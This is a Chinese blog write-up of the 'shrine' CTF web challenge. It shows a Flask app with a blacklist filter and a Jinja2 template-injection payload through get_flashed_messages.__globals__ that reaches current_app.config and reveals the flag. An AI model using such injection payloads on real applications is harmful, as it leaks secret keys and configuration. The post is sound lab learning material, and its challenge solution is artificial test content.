攻防世界web-shrine

最新推荐文章于 2024-05-01 23:47:38 发布
最新推荐文章于 2024-05-01 23:47:38 发布
阅读量185 收藏 1
点赞数 2
分类专栏: web 绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wallacegen/article/details/109731208
版权
web 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
绕过
2 篇文章 0 订阅
订阅专栏

一道ssti题目
打开之后显示源码,整理一下

import flask 
import os 
app = flask.Flask(__name__) 
app.config['FLAG'] = os.environ.pop('FLAG') 
@app.route('/') 
def index(): 
    return open(__file__).read() 

@app.route('/shrine/') 
def shrine(shrine): 
    def safe_jinja(s): 
        s = s.replace('(', '').replace(')', '') 
        blacklist = ['config', 'self'] 
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 
    return flask.render_template_string(safe_jinja(shrine)) 

if __name__ == '__main__': app.run(debug=True)

不难看懂,前提是你得了解一下flask
大概意思就是flag在config里面,但是你直接输入config会给你过滤掉,然后如何绕过config呢?
直接贴上大佬的帖子

https://xz.aliyun.com/t/8029
下面是绕过的方法
{{get_flashed_messages.__globals__['current_app'].config}}

里面有关于config的绕过,其中提到了url_forget_flashed_messages这两个方法,这里就不是很理解了,我理解的这两个方法是要提前传值(可能不对),然后再通过这两个方法进行调用。这里直接调用了这两个方法的全局变量。关键是有‘current_app’,通过‘current_app’获得config。问题是怎么知道这两个方法的全局变量中有current_app,其他的方法还有嘛?

flag的获取就不说了,直接把上面的绕过方法粘过去就行了。
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

'FLAG': 'flag{shrine_is_good_ssti}'

wallacegen
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 shrine 解题详析
等风来
07-24 3795
进入环境:格式化代码:这段代码创建了一个 Flask 应用对象,并设置了一个名为 FLAG 的配置项,其值来自环境变量。然后定义了两个路由,一个用于返回当前文件的内容,另一个用于渲染 Jinja2 模板。推测flag在名为FLAG的config,但黑名单过滤了config,通过Jinja2联想SSTI注入在这个程序,/shrine/ 是定义的路由路径,会匹配到处理该路径的函数。于是构造路径:回显如下:说明SSTI可行在 Flask ,url_for 函数是定义在 Flask 的全局命名空间
攻防世界Web新手练习篇
m0_63944500的博客
11-19 2174
写给刚接触CTF的萌新,感谢支持,谨以此文献给去年的自己。
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
2024年网络安全最新攻防世界Web题 - unseping 总结_unseping攻防世界
最新发布
2401_84302722的博客
05-01 224
【代码】2024年网络安全最新攻防世界Web题 - unseping 总结_unseping攻防世界
2024年最全攻防世界Web题 - unseping 总结_unseping攻防世界(1)
2401_84297796的博客
05-01 343
/把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下:"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160"可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
攻防世界——web新手模式(全解)
AuroraMiraitowa的博客
12-08 1117
3.我们可以从这里观察到,它上面有一个f10g.php文件不允许我们进入,接下来我们就用好奇的金手指复制一下,然后再将robots.txt替换成f10g.php,进入界面即可得到flag;1.robots协议:它是一个网站与搜索引擎之间的一种协议,它主要是告诉爬虫它们那些可以爬那些不能爬,但这个协议并不是一个规范,所以就很鸡肋(相当于写出来让别人看看而已,没啥用)额,这又是一道送分题,我给各位一个建议,你打CTF时多看看源码也不错,说不定出题人意想不到的把flag给注释掉了…前面写过可以看我之前的文章。
react-shrine:使用React构建的“ Shrine”渐进式Web应用程序示例
02-05
该项目是通过。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。 目录 更新到新版本 Create React App分为两个包: create-react-app是用于创建新项目的全局命令行实用程序。...
Ruby-Shrine用来处理文件上传的Ruby工具包
08-15
Shrine - 用来处理文件上传的Ruby工具包
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
the-shrine-ng:a复古音板的渐进式Web应用程序。 神社带有“古德·劳恩!” 还有更多传奇般的声音:speaker_high_volume:
02-05
二十一世纪神社 但为什么? 好吧: 由于技术的进步,保存免于成为历史。 让每个人都为该项目做出贡献。 保留原汁原味的设计(暂时),但使其在小屏幕上可用。 允许它离线使用。...# build for producti
shrine-commerce
04-04
MDC-100系列代码实验室入门要获得Flutter入门方面的帮助,请查看我们的在线。
攻防世界web新手题解2弹
2301_76968724的博客
02-04 859
打开题目链接:提示ip地址必须为 123.123.123.123;这里我们选择使用X-Forwarded-For Header插件工具进行修改,插件可以自行在火狐浏览器插件管理处搜索下载提交X-Forwarded-For: 123.123.123.123之后,页面回显新的信息提示必须来自" 我们在使用hackbar进行增添:此时页面回显出来了flag:cyberpeace{8955cb1a6c19c53bca5dcb5fd36b72a8}
攻防世界-web-shrine-从0到1的解题历程writeup
CTF小白的博客
04-13 4543
题目环境分析 首先开启靶机获取到题目如下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<...
攻防世界web进阶区shrine
gongjingege的博客
07-31 549
打开链接,查看源码 代码审计 看见了flask,考虑模板注入,@app.route后跟着路径,还有一部分过滤 试一下 /shrine/{{1+1}},回显为2,确实是ssti app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个config,flag应该就在这里面,本来可以直接查看{{config}},但后面代码存在过滤 def safe_jinja(s): s = s.replace('(', '').replace(')', '')
攻防世界web进阶区shrine详解
hxhxhxhxx的博客
07-30 1897
攻防世界web进阶区shrine详解题目详解 题目 很明显给了一堆代码,我们将它整理一下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read()\ @app.route('/shrine/') def shrine(shrine):
攻防世界-ics-06详解
Mr_helloword的博客
08-11 1万+
ics-06 题目场景:云平台报表心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 进入题目后有点吓人,这么多,点啊点发现只有一处可以进入 进入报表心选择时间发现怎么点都没反应,看到上面有id改变id大小发现有变化,根据题目提示只有一处数据(这里是进行id爆破有点搞笑我是想不到) BP抓包爆破: 抓包送到爆破模块 设置变量 设置payload 爆破: flag: cyberpeace{7b7a2f215460b0ab1294179bf1b1499a} ...
攻防世界web新手区(1-6)
weixin_46176911的博客
02-05 231
view_source 进入页面鼠标不能用 按F12查看源代码,发现flag robots 直接查看txt发现flag backup
《Flask入门》第七章:Flask那些坑
09年小盆友滴博客
06-17 1598
Hi,这是《Flask入门》的第七篇,本期,我们将说说在Flask开发与生产遇到的坑(bug) 路由必须用斜杠开头 from flask import * app = Flask(__name__) @app.route('startapp') def startapp(): return 'startapp ....' app.run() 报错 Traceback (most recent call last): File "c:/Users/Administrator/stuoe
SSTI模板注入
Joker_York的博客
11-17 183
参考链接:https://www.cnblogs.com/wangtanzhi/p/12238779.html
Flask 框架app = Flask(__name__) 解析
weixin_30493401的博客
08-07 1289
1 #!/usr/local/bin/python 2 # coding=utf-8 3 4 from flask import Flask 5 app = Flask(__name__) 6 7 @app.route('/') 8 def hello_world(): 9 return 'Hello World!' 10 11 if ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值